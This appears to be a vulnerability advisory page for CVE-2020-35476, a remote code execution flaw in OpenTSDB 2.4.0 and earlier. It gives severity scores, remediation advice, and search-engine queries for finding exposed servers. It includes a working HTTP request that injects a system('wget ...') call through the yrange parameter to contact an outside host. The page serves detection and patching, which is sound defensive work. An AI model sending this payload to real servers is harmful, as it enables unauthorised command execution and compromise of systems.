| Title | OpenTSDB <=2.4.0 - Remote Code Execution |
|---|---|
| Author | pikpikcu |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | Upgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.9425 |
| CVE ID | CVE-2020-35476 |
| CWE ID | CWE-78 |
| Shodan Query | html:"OpenTSDB"http.html:"opentsdb" |
| Fofa Query | body="opentsdb" |
| Tags | cve cve2020 opentsdb rce packetstorm vkev vuln |
OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://d5jotlhle0o10b2eb8hgmmg3ebzt6eckm.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.2) AppleWebKit/619.14.1 (KHTML, like Gecko) Version/17.7.52 Safari/619.14.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35476.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-35476.pcap
N/AN/A